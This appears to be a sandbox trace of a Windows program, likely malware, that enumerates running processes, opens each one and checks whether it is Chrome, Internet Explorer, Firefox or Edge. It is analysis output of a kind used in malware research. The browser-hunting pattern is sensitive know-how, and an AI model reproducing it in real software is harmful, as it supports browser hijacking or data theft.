	[0238.459] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.459] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.459] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7dc0
	[0238.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.460] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.461] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.461] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.461] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.461] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.462] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x7dc4
	[0238.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.462] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.463] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.463] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.464] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.464] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.465] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x7dc8
	[0238.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.465] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.465] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.466] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.466] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.466] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.467] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x7dcc
	[0238.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.468] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.468] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.468] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.469] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.469] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7dd0
	[0238.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.470] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.470] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.471] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.471] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.471] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x7dd4
	[0238.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.472] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.472] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.473] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.473] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.473] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0238.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x7dd8
	[0238.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.474] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0238.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.474] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.475] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0238.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.475] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.475] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.476] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x7ddc
	[0238.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.476] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.476] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.477] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.477] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.477] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0238.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7de0
	[0238.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.479] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.480] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.480] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.480] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0238.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x7de4
	[0238.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.483] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0238.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.483] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.484] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0238.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.484] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.484] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.485] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7de8
	[0238.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.486] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.486] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.486] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.487] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.487] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0238.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7dec
	[0238.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.488] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0238.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.488] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.489] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0238.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.489] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.489] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0238.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7df0
	[0238.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.490] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0238.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.490] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.491] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0238.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.491] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.491] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0238.492] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x7df4
	[0238.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.492] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0238.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.492] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.492] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0238.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.493] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.493] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0238.494] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7df8
	[0238.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.494] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0238.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.494] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.495] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0238.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.495] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.495] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0238.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0238.496] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0238.497] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x7dfc
	[0238.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.497] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0238.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.497] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.498] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0238.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.498] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.499] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0238.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7e00
	[0238.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.500] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0238.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.500] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.500] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0238.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.501] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.501] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0238.502] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x7e04
	[0238.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.502] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0238.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.502] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.502] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0238.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.503] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.503] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0238.504] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7e08
	[0238.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.504] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0238.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.504] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.504] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0238.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.505] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.505] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0238.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x7e0c
	[0238.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.506] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0238.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.506] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.507] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0238.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.507] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.508] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0238.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7e10
	[0238.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.509] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0238.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.509] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.510] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0238.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.510] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.510] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0238.511] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x7e14
	[0238.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.511] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0238.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.511] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.512] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0238.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.512] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.513] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0238.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7e18
	[0238.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.514] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0238.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.514] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.515] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0238.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.515] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.515] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0238.516] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x7e1c
	[0238.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.516] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0238.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.516] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.517] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0238.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.517] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
